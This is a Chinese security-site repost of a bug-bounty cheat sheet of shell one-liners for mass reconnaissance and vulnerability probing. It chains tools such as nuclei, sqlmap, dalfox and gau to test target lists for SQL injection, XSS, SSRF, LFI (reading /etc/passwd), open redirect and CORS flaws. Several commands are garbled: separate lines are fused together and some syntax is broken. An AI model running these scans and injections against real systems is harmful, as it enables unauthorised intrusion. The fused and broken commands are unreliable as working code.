自动化漏洞赏金迅速打点命令集合

03.2W+0
华盟原创文章投稿奖励计划

自动化漏洞赏金迅速打点命令集合

注意:本文不含工具安装教程,请自行安装并配置环境变量。以下命令仅适用于Linux|MacOS上运行。

1.单工具使用

Automatic Scan – 使用 wappalyzer 技术检测目标应用的技术栈或组件进行自动 Web 扫描 

nuclei -u https://example.com -as

只运行在最新nuclei-templates版本中添加的模板 

nuclei -u https://example.com -nt

跳过需要身份验证的模板 

nuclei -no-verify -t https://example.com -t /root/nuclei-templates/

漏洞扫描,结果去重写入文件 

nuclei -t /root/nuclei-templates/ -severity critical,high,medium -l list.txt -bs 20 -c 30 -rl 120 -nc -es info | anew -q all_nuclei_output.txt

sql注入扫描 

echo "http://www.example.com" | httpx -path "/listproducts.php?cat=1’" -ms "Error: You have an error in your SQL syntax;"

2.组合工作流

进行子枚举,检查HTTP服务,并将结果通过管道传输到 Nuclei 进行模板的漏洞扫描

subfinder -d targetdomain.com -silent | httpx | nuclei -t technologies/tech-detect.yaml

验证主机/域/资产存活状态

subfinder -d targetdomain.com -silent | httpx -silent -follow-redirects -mc 200 -timeout 10 | cut -d '/' -f3 | sort -uamass enum -d targetdomain.com | httpx -silent -follow-redirects --fc 0,502,400,405,410,503,504 -timeout 10| cut -d '/' -f3 | sort -u

网站预览截图

assetfinder -subs-only http://target.com | httpx -silent -timeout 50 | xargs -I@ sh -c 'gowitness single @'

扫描子域测试站点

subfinder -d domain -silent | dnsprobe -silent | cut -d ' ' -f1 | grep --color 'dmz|api|staging|env|v1|stag|prod|dev|stg|test|demo|pre|admin|beta|vpn|cdn|coll|sandbox|qa|intra|extra|s3|external|back'

XSS

cat targets.txt | anew | httpx -silent -threads 500 | xargs -I@ dalfox url @cat targets.txt | getJS | httpx --match-regex "addEventListener((?:'|")message(?:'|")"

SQL注入

httpx -l targets.txt -silent -threads 1000 | xargs -I@ sh -c 'findomain -t @ -q | httpx -silent | anew | waybackurls | gf sqli >> sqli ; sqlmap -m sqli --batch --random-agent --level 1'

SSRF

findomain -t http://target.com -q | httpx -silent -threads 1000 | gau |  grep "=" | qsreplace http://www.example.com

LFI

gau http://vuln.target.com | gf lfi | qsreplace "/etc/passwd" | xargs -I% -P 25 sh -c 'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"'

重定向

gau http://vuln.target.com | gf redirect | qsreplace "$LHOST" | xargs -I % -P 25 sh -c 'curl -Is "%" 2>&1 | grep -q "Location: $LHOST" && echo "VULN! %"'

Prototype污染

subfinder -d http://target.com | httpx -silent | sed 's/$//?__proto__[testparam]=exploit//' | page-fetch -j 'window.testparam=="exploit"?"[VULN]":"[NOT]"' | sed "s/(//g"|sed"s/)//g" | sed "s/JS//g" | grep "VULN"

CORS

gau http://vuln.target.com | while read url;do target=$(curl -s -I -H "Origin: https://evvil.com" -X GET $url) | if grep 'https://evvil.com'then [Potentional CORS Found]echo $url;else echo Nothing on "$url";fi;done

提取js文件

echo http://target.com | haktrails subdomains | httpx -silent | getJS --complete | tojson | anew JS1assetfinder http://vuln.target.com | waybackurls | grep -E ".json(?:onp?)?$" | anew

从网页源码中提取注释中URL

cat targets.txt | html-tool comments | grep -oE 'b(https?|http)://[-A-Za-z0-9+&@#/%?=~_|!:,.;]*[-A-Za-z0-9+&@#/%=~_|]'

从hackerone上发现转储所属目标企业资产

curl -sL https://github.com/arkadiyt/bounty-targets-data/blob/master/data/hackerone_data.json?raw=true | jq -r '.[].targets.in_scope[] | [.asset_identifier, .asset_type]

持续更新,欢迎补充

更多BugBounty自动化漏洞赏金技巧可以看下这个项目:https://github.com/0x13v/KingOfBugBountyTips

项目地址

大概看了下作者整理的命令,大多是老外挖洞时常用到的一些项目,师傅们可以自己去研究下。 

nuclei:https://github.com/projectdiscovery/nucleinuclei-templates:https://github.com/projectdiscovery/nuclei-templateshttpx:https://github.com/encode/httpxsubfinder:https://github.com/projectdiscovery/subfinderamass:https://github.com/owasp-amass/amassassetfinder:https://github.com/tomnomnom/assetfinderdnsprobe:https://github.com/projectdiscovery/dnsprobeanew:https://github.com/tomnomnom/anewwaybackurls:https://github.com/tomnomnom/waybackurlsgf:https://github.com/gogf/gfsqlmap:https://github.com/sqlmapproject/sqlmapgau:https://github.com/lc/gauqsreplace:https://github.com/tomnomnom/qsreplacepage-fetch:https://github.com/detectify/page-fetchhaktrails:https://github.com/hakluke/haktrailstojson:https://github.com/tomnomnom/hacks/tree/master/tojsonhtml-tool:https://github.com/tomnomnom/hacks/tree/master/html-tool

文章来源:博客园(zha0gongz1)原文地址:https://www.cnblogs.com/zha0gongz1/p/17244222.html

黑白之道发布、转载的文章中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途及盈利等目的,否则后果自行承担!

如侵权请私聊我们删文


END

自动化漏洞赏金迅速打点命令集合

© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
教学频道
喜欢就支持一下吧
点赞0 分享
guaigou的头像-华盟网
HW在即,今日分享|常用的渗透测试工具及相关资料整理,查收!-华盟网
HW在即,今日分享|常用的渗透测试工具及相关资料整理,查收!
HW在即,今日分享|常用的渗透测试工具及相关资料整理,查收!
2年前 29.1W+
重磅|华盟HW工程师招募-华盟网
重磅|华盟HW工程师招募
重磅|华盟HW工程师招募
4年前 27.4W+
最难就业季|“本想先读书躲一躲,谁料行情还不如两年前”-华盟网
最难就业季|“本想先读书躲一躲,谁料行情还不如两年前”
最难就业季|“本想先读书躲一躲,谁料行情还不如两年前”
4年前 25.8W+
挖矿病毒“盯上”了 Docker 服务器-华盟网
挖矿病毒“盯上”了 Docker 服务器
挖矿病毒“盯上”了 Docker 服务器
4年前 24.1W+
让所有反病毒引擎都无法检测到的恶意软件出现了!-华盟网
让所有反病毒引擎都无法检测到的恶意软件出现了!
让所有反病毒引擎都无法检测到的恶意软件出现了!
4年前 23.8W+
功能太强大!网络犯罪论坛新成员Prynt Stealer无所不盗-华盟网
功能太强大!网络犯罪论坛新成员Prynt Stealer无所不盗
功能太强大!网络犯罪论坛新成员Prynt Stealer无所不盗
4年前 23.1W+
相关推荐
教你怎么玩电报(Telegram)-华盟网
教你怎么玩电报(Telegram)
教你怎么玩电报(Telegram)
8年前 64.2W+
【工具】23个国外社交网络及(人肉)搜索工具-华盟网
【工具】23个国外社交网络及(人肉)搜索工具
【工具】23个国外社交网络及(人肉)搜索工具
8年前 36.9W+
kippo进阶版蜜罐:Cowrie-华盟网
kippo进阶版蜜罐:Cowrie
kippo进阶版蜜罐:Cowrie
6年前 34.4W+
远程桌面登录扫描器:Sticky-Keys-Slayer-华盟网
远程桌面登录扫描器:Sticky-Keys-Slayer
远程桌面登录扫描器:Sticky-Keys-Slayer
6年前 33W+
【工具使用】强大的红队武器Octopus“吊打”杀软-华盟网
【工具使用】强大的红队武器Octopus“吊打”杀软
【工具使用】强大的红队武器Octopus“吊打”杀软
6年前 30W+
Captcha插件后门分析和修复-华盟网
Captcha插件后门分析和修复
Captcha插件后门分析和修复
9年前 28.2W+
评论 抢沙发

请登录后发表评论

    暂无评论内容